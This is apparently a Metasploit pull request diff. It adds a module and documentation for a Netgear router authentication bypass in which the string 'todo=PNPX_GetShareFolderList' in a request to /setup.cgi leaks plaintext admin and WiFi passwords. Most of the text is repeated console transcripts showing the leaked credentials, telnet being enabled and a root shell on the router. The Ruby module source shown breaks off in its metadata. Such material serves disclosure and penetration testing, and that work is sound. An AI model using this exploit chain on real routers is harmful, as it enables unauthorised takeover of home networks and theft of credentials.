### PR TITLE
Add in Module for Netgear D7000 Authentication Bypass

### DIFF
--- a/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
@@ -54,104 +54,78 @@ This vulnerability was discovered and exploited by an independent security resea
 
 ### Netgear AC1600 aka R6260 with Firmware Version 1.1.0.40_1.0.1
 ```
-    msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
-    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
-    RHOSTS => 192.168.1.1
-    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
+        msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
+        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
 
-    Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
+        Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
 
-    Name     Current Setting  Required  Description
-    ----     ---------------  --------  -----------
-    Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-    RHOSTS   192.168.1.1      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
+        Name     Current Setting  Required  Description
+        ----     ---------------  --------  -----------
+        Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+        RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
                                         oit
-    RPORT    80               yes       The target port (TCP)
-    SSL      false            no        Negotiate SSL/TLS for outgoing connections
-    VHOST                     no        HTTP server virtual host
+        RPORT    80               yes       The target port (TCP)
+        SSL      false            no        Negotiate SSL/TLS for outgoing connections
+        VHOST                     no        HTTP server virtual host
 
-    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > run
-    [*] Running module against 192.168.1.1
+        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
+        RHOSTS => 192.168.1.1
+        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > check
 
-    [*] Running automatic check ("set AutoCheck false" to disable)
-    [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
-    [+] The target appears to be vulnerable.
-    [*] Confirming target is a Netgear Router...
-    [+] Target is a Netgear router!
-    [*] Attempting to leak the password of the admin user...
-    [+] Can log into target router using username admin and password theRiverOfNope123!
-    [*] Attempting to retrieve /top.html to verify we are logged in!
-    [*] Sending one request to grab authorization cookie from headers...
-    [*] Got the authentication cookie, associating it with a logged in session...
-    [+] Successfully logged into target router using the stolen credentials!
-    [*] Attempting to store stolen admin and WiFi credentials for future use...
-    [*] Enabling telnet on the target router...
-    [+] Telnet enabled on target router!
-    [*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
-    [*] Command shell session 1 opened (192.168.224.128:38283 -> 192.168.1.1:23) at 2021-09-22 13:56:50 -0500
-    [*] Auxiliary module execution completed
-    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
-    [*] Starting interaction with 1...
+        [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
+        [*] 192.168.1.1:80 - The target appears to be vulnerable.
+        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > exploit
+        [*] Running module against 192.168.1.1
+
+        [*] Running automatic check ("set AutoCheck false" to disable)
+        [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
+        [+] The target appears to be vulnerable.
+        [*] Attempting to leak the password of the admin user...
+        [+] Can log into target router using username admin and password theRiverOfNope123!
+        [*] Attempting to retrieve /top.html to verify we are logged in!
+        [*] Sending one request to grab authorization cookie from headers...
+        [*] Got the authentication cookie, associating it with a logged in session...
+        [+] Successfully logged into target router using the stolen credentials!
+        [*] Attempting to store the stolen admin credentials for future use...
+        [*] Enabling telnet on the target router...
+        [+] Telnet enabled on target router!
+        [*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
+        [*] Command shell session 1 opened (192.168.224.128:45717 -> 192.168.1.1:23) at 2021-09-23 16:38:53 -0500
+        [*] Auxiliary module execution completed
+        msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
+        [*] Starting interaction with 1...
 
 
 
-    # id
-    id
-    -sh: id: not found
-    # whoami
-    whoami
-    -sh: whoami: not found
-    # uname -a
-    uname -a
-    Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
-    # ls -al
-    ls -al
-    drwxr-xr-x   12 root     root          286 Jun 21  2016 .
-    drwxr-xr-x   12 root     root          286 Jun 21  2016 ..
-    lrwxrwxrwx    1 root     root            9 Jul 20  2018 bin -> usr/sbin/
-    drwxrwxr-x    2 root     root            3 Aug 15  2015 data
-    drwxr-xr-x    5 root     root            0 Dec 31 16:00 dev
-    lrwxrwxrwx    1 root     root            8 Jul 20  2018 etc -> /tmp/etc
-    lrwxrwxrwx    1 root     root           11 Jul 20  2018 etc_ro -> /tmp/etc_ro
-    lrwxrwxrwx    1 root     root           20 Jul 20  2018 home -> /tmp/home_directory/
-    lrwxrwxrwx    1 root     root           11 Jul 20  2018 init -> bin/busybox
-    drwxr-xr-x    6 root     root         4629 Jul 20  2018 lib
-    drwxr-xr-x    2 root     root            0 Dec 31 16:00 media
-    lrwxrwxrwx    1 root     root            8 Jul 20  2018 mnt -> /tmp/mnt
-    drwxrwxr-x    6 root     root           73 Jul 20  2018 opt
-    dr-xr-xr-x  113 root     root            0 Dec 31 16:00 proc
-    lrwxrwxrwx    1 root     root            9 Jul 20  2018 sbin -> usr/sbin/
-    drwxr-xr-x   11 root     root            0 Dec 31 16:00 sys
-    drwxr-xr-x   16 root     root            0 Dec 31 19:21 tmp
-    drwxr-xr-x   10 root     root          151 Jun 21  2016 usr
-    lrwxrwxrwx    1 root     root            8 Jul 20  2018 var -> /tmp/var
-    lrwxrwxrwx    1 root     root            8 Jul 20  2018 www -> /tmp/www
-    drwxrwxr-x    8 root     root        16662 Jul 20  2018 www.eng
-    # busybox
-    busybox
-    BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
-    Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
-    and others. Licensed under GPLv2.
-    See source distribution for full notice.
+        # uname -a
+        uname -a
+        Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
 
-    Usage: busybox [function] [arguments]...
-    or: function [arguments]...
+        # busybox
+        busybox
+        BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
+        Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
+        and others. Licensed under GPLv2.
+        See source distribution for full notice.
 
-            BusyBox is a multi-call binary that combines many common Unix
-            utilities into a single executable.  Most people will create a
-            link to busybox for each function they wish to use and BusyBox
-            will act like whatever it was invoked as!
+        Usage: busybox [function] [arguments]...
+        or: function [arguments]...
 
-    Currently defined functions:
-            [, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
-            cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
-            ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
-            init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
-            mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
-            ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
-            seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
-            time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
-            vi, wc, wget
+                BusyBox is a multi-call binary that combines many common Unix
+                utilities into a single executable.  Most people will create a
+                link to busybox for each function they wish to use and BusyBox
+                will act like whatever it was invoked as!
 
-    #
+        Currently defined functions:
+                [, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
+                cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
+                ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
+                init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
+                mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
+                ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
+                seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
+                time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
+                vi, wc, wget
+
+        #
 ```

--- a/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
@@ -1,0 +1,155 @@
+## Introduction
+This module targets an authentication bypass vulnerability in the `mini_http` binary of several Netgear Routers
+running firmware versions prior to `1.2.0.88`, `1.0.1.80`, `1.1.0.110`, and `1.1.0.84`.
+
+Specifically, a call to `strstr()` is used to check if requests are authenticated, which searches any requests
+that come in to an authenticated page to see if it contains the string `todo=PNPX_GetShareFolderList` anywhere
+within the request. By including the string `todo=PNPX_GetShareFolderList` in the request,
+
+By using this vulnerability to send a request to `/setup.cgi` with the `next_file` GET parameter set to `BRS_swisscom_success.html`
+and a `x` GET parameter set to `todo=PNPX_GetShareFolderList`, an unauthenticated attacker can leak the plaintext versions of
+all of the router's WiFi passwords, as well as the admin username and plaintext admin password for the router.
+
+Once the password has been been obtained, the exploit enables telnet on the target router by sending a request to `setup.cgi`
+with the `todo` GET parameter set to `debug`. Once telnet has been enabled, it then utilizes the
+`auxiliary/scanner/telnet/telnet_login` module to log into the router using the stolen credentials of the
+`admin` user. This will result in the attacker obtaining a new telnet session as the `root` user.
+
+This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
+
+
+## Vulnerable Application
+
+- AC2100 prior to firmware version 1.2.0.88
+- AC2400 prior to firmware version 1.2.0.88
+- AC2600 prior to firmware version 1.2.0.88
+- D7000 prior to firmware version 1.0.1.80
+- R6220 prior to firmware version 1.1.0.110
+- R6230 prior to firmware version 1.1.0.110
+- R6260 prior to firmware version 1.1.0.84
+- R6330 prior to firmware version 1.1.0.84
+- R6350 prior to firmware version 1.1.0.84
+- R6700v2 prior to firmware version 1.2.0.88
+- R6800 prior to firmware version 1.2.0.88
+- R6850 prior to firmware version 1.1.0.84
+- R6900v2 prior to firmware version 1.2.0.88
+- R7200 prior to firmware version 1.2.0.88
+- R7350 prior to firmware version 1.2.0.88
+- R7400 prior to firmware version 1.2.0.88
+- R7450 prior to firmware version 1.2.0.88
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass`
+  3. Do: `set RHOSTS <RouterIP>`
+  5. Do: `exploit`
+  6. Verify that you get a new telnet shell as the `root` user on the target router.
+
+## Options
+
+## Scenarios
+
+### Netgear AC1600 aka R6260 with Firmware Version 1.1.0.40_1.0.1
+```
+msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
+msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
+
+Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.1.1      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
+                                       oit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > run
+[*] Running module against 192.168.1.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
+[+] The target appears to be vulnerable.
+[*] Confirming target is a Netgear Router...
+[+] Target is a Netgear router!
+[*] Attempting to leak the password of the admin user...
+[+] Can log into target router using username admin and password theRiverOfNope123!
+[*] Attempting to retrieve /top.html to verify we are logged in!
+[*] Sending one request to grab authorization cookie from headers...
+[*] Got the authentication cookie, associating it with a logged in session...
+[+] Successfully logged into target router using the stolen credentials!
+[*] Attempting to store credentials for future use...
+[*] Enabling telnet on the target router...
+[+] Telnet enabled on target router!
+[*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
+[*] Command shell session 1 opened (192.168.224.128:38283 -> 192.168.1.1:23) at 2021-09-22 13:56:50 -0500
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
+[*] Starting interaction with 1...
+
+
+
+# id
+id
+-sh: id: not found
+# whoami
+whoami
+-sh: whoami: not found
+# uname -a
+uname -a
+Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
+# ls -al
+ls -al
+drwxr-xr-x   12 root     root          286 Jun 21  2016 .
+drwxr-xr-x   12 root     root          286 Jun 21  2016 ..
+lrwxrwxrwx    1 root     root            9 Jul 20  2018 bin -> usr/sbin/
+drwxrwxr-x    2 root     root            3 Aug 15  2015 data
+drwxr-xr-x    5 root     root            0 Dec 31 16:00 dev
+lrwxrwxrwx    1 root     root            8 Jul 20  2018 etc -> /tmp/etc
+lrwxrwxrwx    1 root     root           11 Jul 20  2018 etc_ro -> /tmp/etc_ro
+lrwxrwxrwx    1 root     root           20 Jul 20  2018 home -> /tmp/home_directory/
+lrwxrwxrwx    1 root     root           11 Jul 20  2018 init -> bin/busybox
+drwxr-xr-x    6 root     root         4629 Jul 20  2018 lib
+drwxr-xr-x    2 root     root            0 Dec 31 16:00 media
+lrwxrwxrwx    1 root     root            8 Jul 20  2018 mnt -> /tmp/mnt
+drwxrwxr-x    6 root     root           73 Jul 20  2018 opt
+dr-xr-xr-x  113 root     root            0 Dec 31 16:00 proc
+lrwxrwxrwx    1 root     root            9 Jul 20  2018 sbin -> usr/sbin/
+drwxr-xr-x   11 root     root            0 Dec 31 16:00 sys
+drwxr-xr-x   16 root     root            0 Dec 31 19:21 tmp
+drwxr-xr-x   10 root     root          151 Jun 21  2016 usr
+lrwxrwxrwx    1 root     root            8 Jul 20  2018 var -> /tmp/var
+lrwxrwxrwx    1 root     root            8 Jul 20  2018 www -> /tmp/www
+drwxrwxr-x    8 root     root        16662 Jul 20  2018 www.eng
+# busybox
+busybox
+BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
+Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
+and others. Licensed under GPLv2.
+See source distribution for full notice.
+
+Usage: busybox [function] [arguments]...
+   or: function [arguments]...
+
+        BusyBox is a multi-call binary that combines many common Unix
+        utilities into a single executable.  Most people will create a
+        link to busybox for each function they wish to use and BusyBox
+        will act like whatever it was invoked as!
+
+Currently defined functions:
+        [, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
+        cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
+        ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
+        init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
+        mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
+        ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
+        seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
+        time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
+        vi, wc, wget
+
+#
+```

--- a/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
@@ -4,9 +4,10 @@
 This module targets an authentication bypass vulnerability in the `mini_http` binary of several Netgear Routers
 running firmware versions prior to `1.2.0.88`, `1.0.1.80`, `1.1.0.110`, and `1.1.0.84`.
 
-Specifically, a call to `strstr()` is used to check if requests are authenticated, which searches any requests
-that come in to an authenticated page to see if it contains the string `todo=PNPX_GetShareFolderList` anywhere
-within the request. By including the string `todo=PNPX_GetShareFolderList` in the request,
+Specifically, a call to `strstr()` is used to check if any incoming requests to authenticated pages contain
+the string `todo=PNPX_GetShareFolderList` anywhere within the request. If this string is found anywhere within
+the request, the request will be marked as an authenticated request, and will be treated as though it came from
+a logged in administrative user.
 
 By using this vulnerability to send a request to `/setup.cgi` with the `next_file` GET parameter set to `BRS_swisscom_success.html`
 and a `x` GET parameter set to `todo=PNPX_GetShareFolderList`, an unauthenticated attacker can leak the plaintext versions of
@@ -83,7 +84,7 @@ This vulnerability was discovered and exploited by an independent security resea
     [*] Sending one request to grab authorization cookie from headers...
     [*] Got the authentication cookie, associating it with a logged in session...
     [+] Successfully logged into target router using the stolen credentials!
-    [*] Attempting to store credentials for future use...
+    [*] Attempting to store stolen admin and WiFi credentials for future use...
     [*] Enabling telnet on the target router...
     [+] Telnet enabled on target router!
     [*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user

--- a/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md
@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Intro
 This module targets an authentication bypass vulnerability in the `mini_http` binary of several Netgear Routers
 running firmware versions prior to `1.2.0.88`, `1.0.1.80`, `1.1.0.110`, and `1.1.0.84`.
 
@@ -17,8 +19,7 @@ with the `todo` GET parameter set to `debug`. Once telnet has been enabled, it t
 
 This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
 
-
-## Vulnerable Application
+### Affected Versions
 
 - AC2100 prior to firmware version 1.2.0.88
 - AC2400 prior to firmware version 1.2.0.88
@@ -52,104 +53,104 @@ This vulnerability was discovered and exploited by an independent security resea
 
 ### Netgear AC1600 aka R6260 with Firmware Version 1.1.0.40_1.0.1
 ```
-msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
-msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
-RHOSTS => 192.168.1.1
-msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
+    msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
+    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
 
-Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
+    Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.1.1      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
-                                       oit
-   RPORT    80               yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
+    Name     Current Setting  Required  Description
+    ----     ---------------  --------  -----------
+    Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+    RHOSTS   192.168.1.1      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
+                                        oit
+    RPORT    80               yes       The target port (TCP)
+    SSL      false            no        Negotiate SSL/TLS for outgoing connections
+    VHOST                     no        HTTP server virtual host
 
-msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > run
-[*] Running module against 192.168.1.1
+    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > run
+    [*] Running module against 192.168.1.1
 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
-[+] The target appears to be vulnerable.
-[*] Confirming target is a Netgear Router...
-[+] Target is a Netgear router!
-[*] Attempting to leak the password of the admin user...
-[+] Can log into target router using username admin and password theRiverOfNope123!
-[*] Attempting to retrieve /top.html to verify we are logged in!
-[*] Sending one request to grab authorization cookie from headers...
-[*] Got the authentication cookie, associating it with a logged in session...
-[+] Successfully logged into target router using the stolen credentials!
-[*] Attempting to store credentials for future use...
-[*] Enabling telnet on the target router...
-[+] Telnet enabled on target router!
-[*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
-[*] Command shell session 1 opened (192.168.224.128:38283 -> 192.168.1.1:23) at 2021-09-22 13:56:50 -0500
-[*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
-[*] Starting interaction with 1...
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
+    [+] The target appears to be vulnerable.
+    [*] Confirming target is a Netgear Router...
+    [+] Target is a Netgear router!
+    [*] Attempting to leak the password of the admin user...
+    [+] Can log into target router using username admin and password theRiverOfNope123!
+    [*] Attempting to retrieve /top.html to verify we are logged in!
+    [*] Sending one request to grab authorization cookie from headers...
+    [*] Got the authentication cookie, associating it with a logged in session...
+    [+] Successfully logged into target router using the stolen credentials!
+    [*] Attempting to store credentials for future use...
+    [*] Enabling telnet on the target router...
+    [+] Telnet enabled on target router!
+    [*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
+    [*] Command shell session 1 opened (192.168.224.128:38283 -> 192.168.1.1:23) at 2021-09-22 13:56:50 -0500
+    [*] Auxiliary module execution completed
+    msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
+    [*] Starting interaction with 1...
 
 
 
-# id
-id
--sh: id: not found
-# whoami
-whoami
--sh: whoami: not found
-# uname -a
-uname -a
-Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
-# ls -al
-ls -al
-drwxr-xr-x   12 root     root          286 Jun 21  2016 .
-drwxr-xr-x   12 root     root          286 Jun 21  2016 ..
-lrwxrwxrwx    1 root     root            9 Jul 20  2018 bin -> usr/sbin/
-drwxrwxr-x    2 root     root            3 Aug 15  2015 data
-drwxr-xr-x    5 root     root            0 Dec 31 16:00 dev
-lrwxrwxrwx    1 root     root            8 Jul 20  2018 etc -> /tmp/etc
-lrwxrwxrwx    1 root     root           11 Jul 20  2018 etc_ro -> /tmp/etc_ro
-lrwxrwxrwx    1 root     root           20 Jul 20  2018 home -> /tmp/home_directory/
-lrwxrwxrwx    1 root     root           11 Jul 20  2018 init -> bin/busybox
-drwxr-xr-x    6 root     root         4629 Jul 20  2018 lib
-drwxr-xr-x    2 root     root            0 Dec 31 16:00 media
-lrwxrwxrwx    1 root     root            8 Jul 20  2018 mnt -> /tmp/mnt
-drwxrwxr-x    6 root     root           73 Jul 20  2018 opt
-dr-xr-xr-x  113 root     root            0 Dec 31 16:00 proc
-lrwxrwxrwx    1 root     root            9 Jul 20  2018 sbin -> usr/sbin/
-drwxr-xr-x   11 root     root            0 Dec 31 16:00 sys
-drwxr-xr-x   16 root     root            0 Dec 31 19:21 tmp
-drwxr-xr-x   10 root     root          151 Jun 21  2016 usr
-lrwxrwxrwx    1 root     root            8 Jul 20  2018 var -> /tmp/var
-lrwxrwxrwx    1 root     root            8 Jul 20  2018 www -> /tmp/www
-drwxrwxr-x    8 root     root        16662 Jul 20  2018 www.eng
-# busybox
-busybox
-BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
-Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
-and others. Licensed under GPLv2.
-See source distribution for full notice.
+    # id
+    id
+    -sh: id: not found
+    # whoami
+    whoami
+    -sh: whoami: not found
+    # uname -a
+    uname -a
+    Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
+    # ls -al
+    ls -al
+    drwxr-xr-x   12 root     root          286 Jun 21  2016 .
+    drwxr-xr-x   12 root     root          286 Jun 21  2016 ..
+    lrwxrwxrwx    1 root     root            9 Jul 20  2018 bin -> usr/sbin/
+    drwxrwxr-x    2 root     root            3 Aug 15  2015 data
+    drwxr-xr-x    5 root     root            0 Dec 31 16:00 dev
+    lrwxrwxrwx    1 root     root            8 Jul 20  2018 etc -> /tmp/etc
+    lrwxrwxrwx    1 root     root           11 Jul 20  2018 etc_ro -> /tmp/etc_ro
+    lrwxrwxrwx    1 root     root           20 Jul 20  2018 home -> /tmp/home_directory/
+    lrwxrwxrwx    1 root     root           11 Jul 20  2018 init -> bin/busybox
+    drwxr-xr-x    6 root     root         4629 Jul 20  2018 lib
+    drwxr-xr-x    2 root     root            0 Dec 31 16:00 media
+    lrwxrwxrwx    1 root     root            8 Jul 20  2018 mnt -> /tmp/mnt
+    drwxrwxr-x    6 root     root           73 Jul 20  2018 opt
+    dr-xr-xr-x  113 root     root            0 Dec 31 16:00 proc
+    lrwxrwxrwx    1 root     root            9 Jul 20  2018 sbin -> usr/sbin/
+    drwxr-xr-x   11 root     root            0 Dec 31 16:00 sys
+    drwxr-xr-x   16 root     root            0 Dec 31 19:21 tmp
+    drwxr-xr-x   10 root     root          151 Jun 21  2016 usr
+    lrwxrwxrwx    1 root     root            8 Jul 20  2018 var -> /tmp/var
+    lrwxrwxrwx    1 root     root            8 Jul 20  2018 www -> /tmp/www
+    drwxrwxr-x    8 root     root        16662 Jul 20  2018 www.eng
+    # busybox
+    busybox
+    BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
+    Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
+    and others. Licensed under GPLv2.
+    See source distribution for full notice.
 
-Usage: busybox [function] [arguments]...
-   or: function [arguments]...
+    Usage: busybox [function] [arguments]...
+    or: function [arguments]...
 
-        BusyBox is a multi-call binary that combines many common Unix
-        utilities into a single executable.  Most people will create a
-        link to busybox for each function they wish to use and BusyBox
-        will act like whatever it was invoked as!
+            BusyBox is a multi-call binary that combines many common Unix
+            utilities into a single executable.  Most people will create a
+            link to busybox for each function they wish to use and BusyBox
+            will act like whatever it was invoked as!
 
-Currently defined functions:
-        [, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
-        cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
-        ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
-        init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
-        mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
-        ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
-        seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
-        time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
-        vi, wc, wget
+    Currently defined functions:
+            [, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
+            cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
+            ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
+            init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
+            mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
+            ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
+            seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
+            time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
+            vi, wc, wget
 
-#
+    #
 ```

--- a/modules/auxiliary/admin/http/netgear_PNPX_GetShareFolderList_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_PNPX_GetShareFolderList_auth_bypass.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Exploit::Remote::HttpClient
+    prepend Msf::Exploit::Remote::AutoCheck
+
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'Netgear PNPX_GetShareFolderList Authentication Bypass',
+          'Description' => %q{
+            This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers
+            running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows
+            unauthenticated attackers to reveal the password for the admin user that is used to log into the
+            router's administrative portal, in plaintext.
+
+            Once the password has been been obtained, attackers can use the exploit/linux/telnet/netgear_telnetenable module
+            to send a special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
+            then log into this telnet server using the new password, and obtain a shell as the "root" user.
+
+            This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Unknown independent researcher', # Vulnerability discovery and PoC creation.
+            'Grant Willcox' # Metasploit Module
+          ],
+          'References' => [
+            [ 'URL', 'https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133' ],
+            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/' ]
+          ],
+          'Notes' => {
+            'SideEffects' => [ CONFIG_CHANGES ],
